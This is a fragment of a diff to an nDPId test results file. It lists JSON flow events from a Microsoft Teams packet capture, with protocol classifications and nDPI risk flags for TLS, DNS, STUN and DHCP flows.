+00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 